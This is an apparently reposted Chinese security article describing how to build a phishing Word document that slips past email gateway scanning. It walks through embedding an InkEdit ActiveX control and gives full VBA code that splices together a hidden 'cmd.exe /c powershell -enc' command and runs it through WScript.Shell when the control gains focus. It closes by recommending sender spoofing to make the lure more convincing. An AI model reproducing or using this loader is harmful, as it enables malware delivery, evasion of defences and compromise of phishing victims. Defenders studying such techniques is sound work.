NEWS.ALL
Ruizhao's News Reader

Office控件钓鱼:混淆拼接篇

FreeBuf /2020-01-15

钓鱼邮件作为APT常用手法之一,手法层出不穷,各大企业和组织的安全部门也把钓鱼防控列为重点。邮件网关防病毒,防垃圾各类防御设备能上的都上。防御设备虽多,但是为了业务需求,特别是邮件业务繁多的企业,邮件防御设备往往只开启了静态查杀或者特征查杀,均未开启沙箱动态查杀。这里分享一个绕过大部分邮件网关的姿势。

一、钓鱼文档制作

1.1新建文档

这边以word为例,新建一个doc为后缀的word文档,之所以选doc因为doc相较于docm等后缀更具有迷惑性,兼容性也是超棒的。

1.2插入控件

点击开发工具→旧式窗体→更多控件

这里选Microsoft LnkEdit Control,选其他的也行,再配合上漏洞,如flash啥的。

属性如上图,双击控件,编辑代码

1.3代码编写(拼接)

由于杀软的特征库的日益完善,特别是工具生成的恶意代码,分分钟就被杀了,这时候我们就要想办法进行绕过查杀。这里我们用代码拼接的方法。拼接部分可以写在任意的地方,只要能够取值,如下图就把代码插在了控件的属性变量中。

完整代码如下

Private Sub InkEdit1_GotFocus()

xiaojiangjj1cm

Application.DisplayAlerts = True

End Sub

Private Sub xiaojiangjj1cm()

Dim var_str, str00, str01, str2, str22

str1 = "ell.exe -noP -sta -w 1 -enc xe /c powershcmd.e"

str22 = Right(str1, 18)

str2 = Right(str22, 5) & Mid(str22, 1, Len(str22) - 5) & Mid(str1, 1, Len(str1) - 18)

str00 = InkEdit1.Text

var_str = str2 & str00

Set ws = CreateObject("WScr" & "ipt.Sh" & "ell")

ws.Run var_str, 0, False

End Sub

为了更加客观,我们进行调试

可以看出正文用了多个变量进行拼接命令,甚至可以添加脏数据。最后拼接处命令执行。

二、效果演示

点击前控件变成一个XX,我们可以在XX底下放张图片,根据钓鱼内容,使其更具迷惑性。而且值得注意的是,安全警告不再是启用宏而是部分活动内容被禁用。使其更具迷惑性。

点击后

写在最后:

钓鱼文件混淆只要把恶意代码多分几块就可以轻松绕过各类静态查杀,再配合上发件人伪造(超链接),这样就可以使钓鱼邮件更具迷惑性,增加成功率。

*本文作者:꧁,转载请注明来自FreeBuf.COM